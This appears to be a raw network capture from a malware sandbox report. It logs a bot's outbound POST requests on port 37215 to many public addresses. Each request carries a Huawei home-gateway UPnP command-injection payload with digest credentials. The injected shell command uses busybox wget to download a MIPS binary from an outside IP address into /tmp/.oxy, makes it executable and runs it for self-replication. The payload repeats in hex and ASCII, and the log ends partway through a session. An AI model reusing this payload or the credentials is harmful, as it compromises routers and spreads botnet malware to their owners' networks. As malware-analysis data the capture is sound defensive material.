69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  497192.168.2.1340472172.182.102.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287177086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  498192.168.2.133396841.189.211.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287195921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  499192.168.2.1341490197.188.44.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287211895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  500192.168.2.1342956197.108.130.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287517071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  501192.168.2.134392097.42.204.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287535906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  502192.168.2.135644680.96.69.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287555933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  503192.168.2.1340748157.188.220.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287583113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  504192.168.2.1343480157.201.178.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287606001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  505192.168.2.1334002155.164.36.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287621021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  506192.168.2.135745841.186.197.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287637949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  507192.168.2.1360622197.37.145.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287659883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
